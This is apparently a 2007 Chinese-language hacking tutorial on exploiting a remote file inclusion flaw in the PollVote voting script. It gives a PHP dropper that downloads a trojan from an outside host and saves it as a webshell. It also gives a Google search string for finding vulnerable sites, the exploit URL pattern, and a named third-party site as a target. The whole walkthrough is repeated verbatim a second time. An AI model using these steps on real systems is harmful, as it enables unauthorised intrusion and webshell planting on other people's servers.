PollVote投票系統(tǒng)漏洞利用
更新時間:2007年01月16日 00:00:00 作者:
PollVote是一個投票系統(tǒng),今天看了非安全的雜志,看了利用方法,
不過作者說利用過程的時候很煩瑣,關鍵的時候又沒說明白,
簡單的說一下``
首先建立2個文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內容就寫個PHP木馬
之后在http://www.google.com 搜索關鍵詞"pollvote.php?pollname"
有很多,
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個就是利用原理了,
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內容就會生成一個111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
不過作者說利用過程的時候很煩瑣,關鍵的時候又沒說明白,
簡單的說一下``
首先建立2個文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內容就寫個PHP木馬
之后在http://www.google.com 搜索關鍵詞"pollvote.php?pollname"
有很多,
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個就是利用原理了,
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內容就會生成一個111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php